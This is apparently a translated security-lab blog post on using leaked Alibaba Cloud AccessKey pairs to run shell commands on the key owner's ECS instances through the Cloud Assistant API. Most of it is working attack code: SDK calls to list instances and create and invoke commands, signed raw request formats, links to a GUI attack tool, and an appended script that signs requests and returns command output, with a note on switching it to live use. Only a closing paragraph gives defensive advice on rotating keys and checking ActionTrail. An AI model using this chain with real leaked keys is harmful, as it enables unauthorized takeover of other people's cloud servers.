Introduction

(Written by 一灯老和尚, core member of Gamma Lab)

During routine penetration tests we frequently run into leaked ALIYUN_ACCESSKEYID and ALIYUN_ACCESSKEYSECRET values (Alibaba Cloud API keys), especially in Laravel debug pages; mobile apps leak them as well. So how do we use such a leaked key pair directly to obtain a shell on the owner's Alibaba Cloud hosts? The download link for the tool is at the end of the article.

Overview

First, what the Alibaba Cloud API is for, in the words of the official documentation: Elastic Compute Service (ECS) exposes an API through which you can manage your cloud resources and build your own applications. The ECS API accepts requests over HTTP or HTTPS and allows the GET and POST methods. It can be called in the ways described below; for details see the official API reference: https://help.aliyun.com/document_detail/25484.html?spm=a2c4g.11186623.6.1276.12244f88jytZ8c

Two practical prerequisites worth knowing before trying this: the RAM identity behind the key must be allowed to call the ECS command APIs (CreateCommand, InvokeCommand), and the target instance must be running the Cloud Assistant agent, which is preinstalled on Alibaba Cloud public images but may be missing on custom ones. Every call made with the key is also recorded in ActionTrail, so the owner can find it afterwards.

Development approach

1. Through the Alibaba Cloud SDK

SDK: https://github.com/aliyun/aliyun-openapi-python-sdk

Install with pip:

    # Install the core library
    pip install aliyun-python-sdk-core
    # Install the ECS management library
    pip install aliyun-python-sdk-ecs
    # Install the RDS management library
    pip install aliyun-python-sdk-rds

Querying ECS instances (DescribeInstances):

    #!/usr/bin/env python
    # coding=utf-8
    from aliyunsdkcore.client import AcsClient
    from aliyunsdkcore.acs_exception.exceptions import ClientException
    from aliyunsdkcore.acs_exception.exceptions import ServerException
    from aliyunsdkecs.request.v20140526.DescribeInstancesRequest import DescribeInstancesRequest

    # The leaked key pair and the region to enumerate
    client = AcsClient('<accessKeyId>', '<accessSecret>', 'cn-hangzhou')

    request = DescribeInstancesRequest()
    request.set_accept_format('json')

    response = client.do_action_with_exception(request)
    # python2: print(response)
    print(str(response, encoding='utf-8'))

Creating a Cloud Assistant command (CreateCommand):

    #!/usr/bin/env python
    # coding=utf-8
    import base64
    from aliyunsdkcore.client import AcsClient
    from aliyunsdkcore.acs_exception.exceptions import ClientException
    from aliyunsdkcore.acs_exception.exceptions import ServerException
    from aliyunsdkecs.request.v20140526.CreateCommandRequest import CreateCommandRequest

    client = AcsClient('<accessKeyId>', '<accessSecret>', 'cn-hangzhou')

    request = CreateCommandRequest()
    request.set_accept_format('json')
    # Required parameters: a name, the script type, and the script body,
    # which the API expects base64-encoded
    request.set_Name('test')
    request.set_Type('RunShellScript')
    request.set_CommandContent(base64.b64encode(b'id; hostname').decode())

    response = client.do_action_with_exception(request)
    # python2: print(response)
    print(str(response, encoding='utf-8'))

This returns a Cloud Assistant command ID:

    {
        "RequestId": "E69EF3CC-94CD-42E7-8926-F133B86387C0",
        "CommandId": "c-7d2a745b412b4601b2d47f6a768d3a14"
    }

Running the command on instances (InvokeCommand):

    #!/usr/bin/env python
    # coding=utf-8
    from aliyunsdkcore.client import AcsClient
    from aliyunsdkcore.acs_exception.exceptions import ClientException
    from aliyunsdkcore.acs_exception.exceptions import ServerException
    from aliyunsdkecs.request.v20140526.InvokeCommandRequest import InvokeCommandRequest

    client = AcsClient('<accessKeyId>', '<accessSecret>', 'cn-hangzhou')

    request = InvokeCommandRequest()
    request.set_accept_format('json')
    # CommandId from CreateCommand, instance IDs from DescribeInstances
    request.set_CommandId('c-7d2a745b412b4601b2d47f6a768d3a14')
    request.set_InstanceIds(['i-bp1j4i2jdf3owlhe****'])

    response = client.do_action_with_exception(request)
    # python2: print(response)
    print(str(response, encoding='utf-8'))

Response:

    {
        "RequestId": "E69EF3CC-94CD-42E7-8926-F133B86387C0",
        "InvokeId": "t-7d2a745b412b4601b2d47f6a768d3a14"
    }

The InvokeId identifies this run; the command's output is fetched afterwards with DescribeInvocationResults, where it comes back base64-encoded. The security group part is omitted here; follow the API documentation.

2. Through raw GET/POST requests

First, the public request parameters that every call carries:

    Name              Type    Required  Description
    Action            String  Yes       Name of the API. See the API overview for values.
    AccessKeyId       String  Yes       Access key ID. The AccessKey is used to call the API; the account password is used to log in to the ECS console.
    Signature         String  Yes       Your signature. See the signing mechanism.
    SignatureMethod   String  Yes       Signing algorithm. Value: HMAC-SHA1
    SignatureVersion  String  Yes       Signature algorithm version. Value: 1.0
    SignatureNonce    String  Yes       Unique random number for the signature, used to prevent replay attacks. Use a different value for every request.
    Timestamp         String  Yes       Request timestamp in ISO 8601, UTC, format yyyy-MM-ddTHH:mm:ssZ. Example: 2018-01-01T12:00:00Z is 2018-01-01 20:00:00 Beijing time.
    Version           String  Yes       API version, format YYYY-MM-DD. Value: 2014-05-26
    Format            String  No        Response format. Values: json, xml. Default: xml

2.1 GET request

    https://ecs.aliyuncs.com/?Action=DescribeInstanceStatus
    &RegionId=cn-hangzhou
    &PageSize=1
    &PageNumber=1
    &InstanceId.1=i-bp1j4i2jdf3owlhe****
    &<public request parameters>

XML response:

    <DescribeInstanceStatusResponse>
        <PageNumber>1</PageNumber>
        <InstanceStatuses>
            <InstanceStatus>
                <Status>Running</Status>
                <InstanceId>i-bp1j4i2jdf3owlhe****</InstanceId>
            </InstanceStatus>
        </InstanceStatuses>
        <TotalCount>58</TotalCount>
        <PageSize>1</PageSize>
        <RequestId>746C3444-9A24-4D7D-B8A8-DCBF7AC8BD66</RequestId>
    </DescribeInstanceStatusResponse>

JSON response:

    {
        "PageNumber": 1,
        "InstanceStatuses": {
            "InstanceStatus": [
                {
                    "Status": "Running",
                    "InstanceId": "i-bp1j4i2jdf3owlhe****"
                }
            ]
        },
        "TotalCount": 58,
        "PageSize": 1,
        "RequestId": "746C3444-9A24-4D7D-B8A8-DCBF7AC8BD66"
    }

2.2 POST request

    POST / HTTP/1.1
    Host: ecs.aliyuncs.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: <length of the body below>

    Action=DescribeInstanceStatus&RegionId=cn-hangzhou&PageSize=1&PageNumber=1&InstanceId.1=i-bp1j4i2jdf3owlhe****&<public request parameters>

The response is the same as for the GET request.

Using the tool

The tool has a graphical interface, so there is not much to explain.

[Screenshot of the tool's interface; the image is not included here.]

Closing

Alibaba Cloud's API is a convenience for operations and development staff, but they also need to take security seriously and make sure their keys do not leak. A leaked key hands over every ECS instance in the account: no network path to the hosts is needed, since the commands are run by the Cloud Assistant agent already on each machine. The risk is higher than that of a typical high-severity vulnerability. If a key has leaked, disable or rotate it in RAM first, then review ActionTrail for CreateCommand and InvokeCommand calls to find what was run.

Download links and related articles

Project: https://github.com/mrknow001/aliyun-accesskey-Tools

Tool download: https://github.com/mrknow001/aliyun-accesskey-Tools/releases/download/1.0/Aliyun-.AK.Tools.exe

Follow the WeChat public account "Gamma安全实验室" for occasional technical articles and security tools.
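The following is an added example written for this page; it is not code from the original post, from the linked aliyun-accesskey-Tools project, or from Alibaba Cloud's SDK. It implements the HMAC-SHA1 request signature that the public request parameters in section 2 call for (sorted, percent-encoded canonical query, key = AccessKeySecret + "&", base64 result), and uses it to drive the section 1 chain (CreateCommand, InvokeCommand, then DescribeInvocationResults to read the output) over plain form-encoded POST requests, so the whole flow can be followed without the SDK. Assumptions: the DescribeInvocationResults field names (Invocation.InvocationResults.InvocationResult[].InvokeRecordStatus and a base64 Output) are taken from the ECS API reference and should be checked against it; offline_send(), the CommandId/InvokeId values it returns, and the example key pair are constructed for illustration only.

```python
# Added example, not code from the original post or from Alibaba Cloud: sign ECS
# RPC calls by hand (the public request parameters of section 2) and drive the
# Cloud Assistant chain of section 1 (CreateCommand -> InvokeCommand ->
# DescribeInvocationResults) over plain HTTPS POST.  `send` is injectable, so the
# chain can be exercised offline with the constructed responses in offline_send().
import base64
import hashlib
import hmac
import json
import time
import uuid
from datetime import datetime, timezone
from urllib.parse import quote, urlencode
from urllib.request import Request, urlopen

ENDPOINT = "https://ecs.aliyuncs.com/"


def percent_encode(value):
    # RFC 3986 form the signature spec demands: space -> %20, '*' -> %2A, '~' left alone.
    return quote(str(value), safe="~").replace("+", "%20").replace("*", "%2A")


def string_to_sign(method, params):
    # Sort by parameter name, join as k=v (both encoded), then encode the whole string again.
    canon = "&".join(f"{percent_encode(k)}={percent_encode(v)}" for k, v in sorted(params.items()))
    return f"{method}&{percent_encode('/')}&{percent_encode(canon)}"


def sign(secret, method, params):
    # HMAC-SHA1 keyed with AccessKeySecret + "&"; the result is base64, not hex.
    mac = hmac.new((secret + "&").encode(), string_to_sign(method, params).encode(), hashlib.sha1)
    return base64.b64encode(mac.digest()).decode()


def signed_params(ak_id, ak_secret, action, extra, method="POST", nonce=None, timestamp=None):
    # Public parameters from the post's table plus the action's own; Signature is added last
    # and is never part of the string that gets signed.
    params = {
        "Action": action, "Version": "2014-05-26", "Format": "JSON",
        "AccessKeyId": ak_id, "SignatureMethod": "HMAC-SHA1", "SignatureVersion": "1.0",
        "SignatureNonce": nonce or str(uuid.uuid4()),   # fresh per request: replay protection
        "Timestamp": timestamp or datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
        **extra,
    }
    params["Signature"] = sign(ak_secret, method, params)
    return params


def https_send(params):
    # Real transport, same shape as the post's 2.2 POST example.
    req = Request(ENDPOINT, data=urlencode(params).encode(), method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    with urlopen(req, timeout=30) as resp:
        return json.loads(resp.read().decode())


def run_shell_on_instance(ak_id, ak_secret, region, instance_id, script,
                          send=https_send, poll_seconds=2.0):
    """Run `script` on one ECS instance via Cloud Assistant; return (invoke_id, decoded output)."""
    def call(action, extra):
        return send(signed_params(ak_id, ak_secret, action, {"RegionId": region, **extra}))

    cmd = call("CreateCommand", {
        "Name": "probe-" + uuid.uuid4().hex[:8],
        "Type": "RunShellScript",                                      # Linux agent; Windows uses RunBatScript/RunPowerShellScript
        "CommandContent": base64.b64encode(script.encode()).decode(),  # the API takes the script base64-encoded
    })
    inv = call("InvokeCommand", {"CommandId": cmd["CommandId"], "InstanceId.1": instance_id})
    # Output is only available once the agent reports the record Finished (or Failed).
    for _ in range(30):
        res = call("DescribeInvocationResults", {"InvokeId": inv["InvokeId"]})
        results = res["Invocation"]["InvocationResults"]["InvocationResult"]
        if results and results[0]["InvokeRecordStatus"] in ("Finished", "Failed"):
            return inv["InvokeId"], base64.b64decode(results[0]["Output"]).decode(errors="replace")
        time.sleep(poll_seconds)
    raise TimeoutError("Cloud Assistant invocation did not complete")


def offline_send(params):
    # Constructed stand-in for the API so the chain can be traced without credentials.
    # It checks that each request carries a signature and echoes the script back as "output".
    assert params["Signature"] and params["SignatureMethod"] == "HMAC-SHA1"
    if params["Action"] == "CreateCommand":
        offline_send.script = base64.b64decode(params["CommandContent"]).decode()
        return {"RequestId": "00000000-0000-0000-0000-000000000000", "CommandId": "c-constructed"}
    if params["Action"] == "InvokeCommand":
        assert params["CommandId"] == "c-constructed" and params["InstanceId.1"]
        return {"RequestId": "00000000-0000-0000-0000-000000000000", "InvokeId": "t-constructed"}
    if params["Action"] == "DescribeInvocationResults":
        output = base64.b64encode(("ran: " + offline_send.script).encode()).decode()
        return {"Invocation": {"InvocationResults": {"InvocationResult": [
            {"InvokeRecordStatus": "Finished", "ExitCode": 0, "Output": output}]}}}
    raise ValueError("unexpected action " + params["Action"])


if __name__ == "__main__":
    # Offline trace of the chain; swap send=https_send and real credentials to run it for real.
    invoke_id, out = run_shell_on_instance("LTAI-example-id", "example-secret", "cn-hangzhou",
                                           "i-bp1j4i2jdf3owlhe****", "id; hostname", send=offline_send)
    print(invoke_id, out)
```

The signing functions are the part to get right: a single mis-encoded character (a "+" for a space, or a "*" left unencoded, as in the instance ID above) yields SignatureDoesNotMatch, and the Signature parameter itself must be excluded from the string that is signed. Against the live API, replace offline_send with https_send and use the region that DescribeInstances showed the instance in.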